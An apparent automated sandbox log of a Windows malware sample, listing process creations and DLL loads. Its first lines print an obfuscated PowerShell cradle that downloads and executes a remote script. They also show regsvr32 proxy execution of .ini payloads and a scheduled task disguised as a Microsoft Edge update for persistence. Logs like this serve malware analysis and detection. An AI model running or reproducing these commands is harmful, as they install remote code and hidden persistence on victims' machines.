Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Source: C:\Program Files\Windows Media Player\wmprph.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Source: C:\Program Files\Windows Media Player\wmprph.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: quartz.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: qedit.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: devenum.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dsound.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msdmo.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: avrt.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: audioses.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: midimap.dll Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wudfplatform.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wldp.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: profapi.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\wmprph.exe Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Media Player\wmprph.exe Section loaded: mswsock.dll
Source: C:\Program Files\Windows Media Player\wmprph.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sspicli.dll
